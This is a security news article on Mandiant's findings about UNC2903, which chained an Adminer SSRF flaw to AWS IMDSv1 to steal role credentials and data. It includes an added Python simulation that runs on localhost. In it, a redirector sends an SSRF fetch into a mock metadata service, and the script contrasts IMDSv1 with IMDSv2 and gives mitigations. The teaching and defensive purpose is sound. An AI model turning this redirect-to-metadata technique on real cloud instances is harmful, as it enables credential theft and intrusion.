A threat group exploits a web application flaw to reach cloud instance metadata, which in turn hands it the credentials it needs to steal data from AWS database instances.
Mandiant researchers discovered an attack operation by a threat group designated UNC2903. The attacks, which took place from May to June last year, saw the threat actors steal corporate data from AWS environments after a long period of reconnaissance.
“Threats identified in campaigns conducted by UNC2903 were multi-phased attacks, which involved infrastructure analysis, reconnaissance and abuse of the underlying layers of abstraction offered by hosted platforms in the cloud,” the researchers explained in a blog post on Wednesday.
“Once the exploitation and abuse of the underlying systems has occurred, the stolen credentials are exploited for data exfiltration into other AWS services in the compromised tenant.”
Mandiant told SearchSecurity that no specific industry or sector was targeted in this case, suggesting the attackers were opportunistic and simply looking for web applications known to be vulnerable.
In this attack, the vulnerable web applications used Adminer, a popular database management tool used to link web applications to cloud database instances. The server-side request forgery (SSRF) flaw, tracked as CVE-2021-21311, does not expose AWS secret keys directly, but it lets an attacker make the Adminer server issue HTTP requests on their behalf and read back a certain amount of instance metadata.
This metadata is the key to the attack, according to Mandiant. By steering the forged request at IMDSv1, the first version of the EC2 Instance Metadata Service, which answers any plain HTTP GET from inside the instance without authentication, the attacker can trick the server into returning an error message containing the AWS secret keys (the temporary access key, secret key and session token of the instance's IAM role).
From there, the attackers can authenticate with those keys and connect directly to the AWS database instance to steal the data stored there.
Although Adminer has since been patched and AWS has superseded IMDSv1 with IMDSv2, which requires a session token obtained via an HTTP PUT and therefore blocks this kind of simple GET-based SSRF, UNC2903 found enough unpatched web applications and instances still accepting IMDSv1 requests to amass a string of successful data heists. Because the attackers focused on AWS, Mandiant said, other cloud providers with similar metadata services could be exposed to the same technique.
Administrators can protect their databases from the UNC2903 technique by updating Adminer to version 4.7.9 or later and requiring IMDSv2 on their instances, but Mandiant researchers noted that a larger problem will persist as long as companies continue to link their web applications to cloud services.
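The following is an added, self-contained simulation of the chain described above and of the IMDSv2 mitigation; it is not Mandiant's code, Adminer's code or AWS's service. A mock metadata service runs twice on localhost, once behaving like IMDSv1 (any GET answered) and once like IMDSv2 (a session token from a PUT to /latest/api/token is required). An attacker-controlled "database host" answers with a 302 redirect into the metadata service, and an Adminer-style fetch follows that redirect with a plain GET and reflects whatever comes back, which is how the credentials end up in an error message. The role name, ports and credentials are constructed for the demo and are not real keys.

```python
"""Offline simulation of SSRF -> redirect -> instance metadata, against a mock
IMDSv1 and a mock IMDSv2. Everything here is constructed demo data, not AWS."""
import http.server
import json
import threading
import urllib.error
import urllib.request

ROLE = "web-app-role"  # hypothetical instance role name
FAKE_CREDS = {  # constructed sample credentials; not real AWS keys
    "Code": "Success",
    "AccessKeyId": "AKIAEXAMPLEEXAMPLE",
    "SecretAccessKey": "EXAMPLEsecretEXAMPLEsecret",
    "Token": "EXAMPLEsessiontoken",
}
SESSION_TOKEN = "v2-session-token"  # what the mock IMDSv2 hands out on PUT


def make_imds(require_token):
    """Handler class for a mock IMDS. require_token=False mimics IMDSv1
    (plain GET answered); True mimics IMDSv2 (token header required)."""

    class IMDS(http.server.BaseHTTPRequestHandler):
        def log_message(self, *args):  # keep the demo quiet
            pass

        def _reply(self, code, body):
            data = body.encode()
            self.send_response(code)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def do_PUT(self):
            # IMDSv2 session bootstrap: PUT /latest/api/token with a TTL header.
            if self.path == "/latest/api/token" and "X-aws-ec2-metadata-token-ttl-seconds" in self.headers:
                self._reply(200, SESSION_TOKEN)
            else:
                self._reply(400, "bad request")

        def do_GET(self):
            if require_token and self.headers.get("X-aws-ec2-metadata-token") != SESSION_TOKEN:
                self._reply(401, "unauthorized")  # IMDSv2 rejects token-less GETs
                return
            if self.path == "/latest/meta-data/iam/security-credentials/" + ROLE:
                self._reply(200, json.dumps(FAKE_CREDS))
            else:
                self._reply(404, "not found")

    return IMDS


def make_redirector(target):
    """Attacker-controlled 'database host': answers every GET with a 302 to IMDS."""

    class Redirector(http.server.BaseHTTPRequestHandler):
        def log_message(self, *args):
            pass

        def do_GET(self):
            self.send_response(302)
            self.send_header("Location", target)
            self.send_header("Content-Length", "0")
            self.end_headers()

    return Redirector


def start_server(handler_cls):
    srv = http.server.HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def ssrf_fetch(url):
    """The vulnerable behaviour: one plain GET, redirects followed automatically,
    and the body of the final response (success or error) reflected to the caller."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def run_chain(require_token):
    """Stand up mock IMDS + redirector, fire the SSRF, return (status, body)."""
    imds, imds_url = start_server(make_imds(require_token))
    cred_url = imds_url + "/latest/meta-data/iam/security-credentials/" + ROLE
    redir, redir_url = start_server(make_redirector(cred_url))
    try:
        return ssrf_fetch(redir_url + "/")
    finally:
        for srv in (imds, redir):
            srv.shutdown()
            srv.server_close()


def run_legit_v2():
    """How a real IMDSv2 client works: PUT for a token, then GET with the token."""
    imds, base = start_server(make_imds(require_token=True))
    try:
        req = urllib.request.Request(base + "/latest/api/token", data=b"", method="PUT",
                                     headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
        with urllib.request.urlopen(req, timeout=5) as resp:
            token = resp.read().decode()
        req = urllib.request.Request(base + "/latest/meta-data/iam/security-credentials/" + ROLE,
                                     headers={"X-aws-ec2-metadata-token": token})
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    finally:
        imds.shutdown()
        imds.server_close()


if __name__ == "__main__":
    for mode in (False, True):
        code, body = run_chain(require_token=mode)
        print("IMDSv%d via SSRF -> %d %s" % (2 if mode else 1, code, body[:60]))
    print("IMDSv2 legitimate client ->", run_legit_v2()[0])
```

Against the v1 mock the reflected body is the credential JSON; against the v2 mock the same SSRF only yields a 401, because a redirect-following GET cannot carry the token that a prior PUT would have returned. On a real instance the equivalent hardening is to require IMDSv2, for example with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`, and to keep the response hop limit low so the token cannot be fetched through a forwarding layer.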
“As adoption of cloud technology grows, so does the threat surface and the targeting of vulnerable web infrastructures with outdated underlying metadata services with limited security capabilities,” the researchers explained. “The level of risk from web application vulnerabilities should be assessed and coupled with the understanding that underlying metadata services in cloud environments could increase the possibility of advanced or ongoing threats.”
Mandiant said it had been tracking UNC2903 since July 2021 but had not attributed the group to a specific nation; the researchers described the group as “opportunistic” but noted that they had not observed the threat actors attempting to monetize the stolen data.